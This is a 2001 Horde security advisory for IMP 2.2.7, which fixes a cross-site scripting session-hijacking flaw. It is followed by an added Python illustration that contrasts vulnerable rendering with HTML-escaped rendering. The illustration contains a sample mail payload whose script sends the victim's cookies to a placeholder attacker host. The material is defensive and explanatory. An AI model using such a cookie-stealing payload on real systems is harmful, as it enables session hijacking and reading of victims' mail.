IMP 2.2.7 (SECURITY) released
From: "Brent J. Nordquist" <bjn () horde org>
Date: Sat, 10 Nov 2001 09:05:26 -0600 (CST)
The Horde team announces the availability of IMP 2.2.7, which fixes a
potential session hijacking vulnerability using a cross-site scripting
(CSS) attack. We recommend that all sites running IMP 2.2.x upgrade to
The Horde Project would like to thank João Pedro Gonçalves from the
Phibernet Information Network <megas () phibernet org> for discovering this
problem and alerting us. From his description:
- It's possible to hijack an imp/horde session using a cross-site
scripting attack, quite similar to the one explored by Marc Slemko in his
"Microsoft Passport to Trouble" paper.
- After hijacking the cookies, the attacker can use the session and read
the victim's mail.
- All stable imp webmail versions, up to and including 2.2.6, are vulnerable;
the devel version, 2.3, and 3.0 Release Candidate 1 are not affected by
This release also has a new Chinese (Simplified) translation.
This release can be downloaded from the following locations:
Brent J. Nordquist <bjn () horde org> N0BJN
Yahoo!: Brent_Nordquist / AIM: BrentJNordquist / ICQ: 76158942
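The attack class the advisory describes (script injected into a webmail page runs in the webmail origin, reads the session cookie, and hands it to the attacker) is illustrated below. This is an added example, not Horde/IMP code and not the actual vector fixed in 2.2.7: the mail body, the attacker hostname, the page template and the cookie name are all constructed for the demonstration. It shows the vulnerable rendering (raw mail body interpolated into HTML) next to the hardened one (body HTML-escaped before it is emitted), plus the cookie attributes that later browsers added as defence in depth.

```python
import html
import re

# Constructed sample: a mail body an attacker sends to the victim. When the
# webmail page renders it as markup, the script ships the viewer's cookies to
# an attacker-controlled host (placeholder hostname, not from the advisory).
MALICIOUS_BODY = (
    'Hi! <script>'
    'new Image().src="http://attacker.invalid/c?"+document.cookie;'
    '</script>'
)

# Minimal stand-in for a webmail message view (assumed, not the IMP template).
PAGE_TEMPLATE = '<html><body><h1>Inbox</h1><div class="msg">{body}</div></body></html>'


def render_message_vulnerable(body: str) -> str:
    """Interpolates the raw mail body into the page.

    Any <script> (or event handler) in the mail executes with the webmail
    origin, so document.cookie exposes the victim's session to the sender.
    """
    return PAGE_TEMPLATE.format(body=body)


def render_message_safe(body: str) -> str:
    """Escapes the mail body so the browser treats it as text, not markup.

    html.escape turns <, >, &, " and ' into entities; the attacker's
    <script> element arrives at the browser as literal characters.
    """
    return PAGE_TEMPLATE.format(body=html.escape(body, quote=True))


# Heuristic used only to show the difference between the two renderers; it
# is not a sanitizer, the escaping above is what actually protects the page.
_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_active_script(page: str) -> bool:
    """True if the rendered page still carries a live <script> start tag."""
    return _SCRIPT_TAG.search(page) is not None


def session_cookie_header(session_id: str, cookie_name: str = "sessid") -> str:
    """Defence-in-depth attributes for the session cookie itself.

    HttpOnly keeps document.cookie from reading the value and Secure keeps it
    off plaintext HTTP. Both post-date this 2001 advisory and do not replace
    output escaping, but they shrink what an injected script can steal.
    The cookie name is a placeholder, not Horde's.
    """
    return f"Set-Cookie: {cookie_name}={session_id}; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    print("vulnerable page has live script:",
          contains_active_script(render_message_vulnerable(MALICIOUS_BODY)))
    print("escaped page has live script:",
          contains_active_script(render_message_safe(MALICIOUS_BODY)))
    print(session_cookie_header("0123456789abcdef"))
```

The escaped rendering still shows the attacker's text in the inbox, which is what a webmail client should do with untrusted content; only the interpretation as markup is removed. Escaping at output time is the fix that addresses the root cause, and the cookie attributes only limit the damage of a future injection bug.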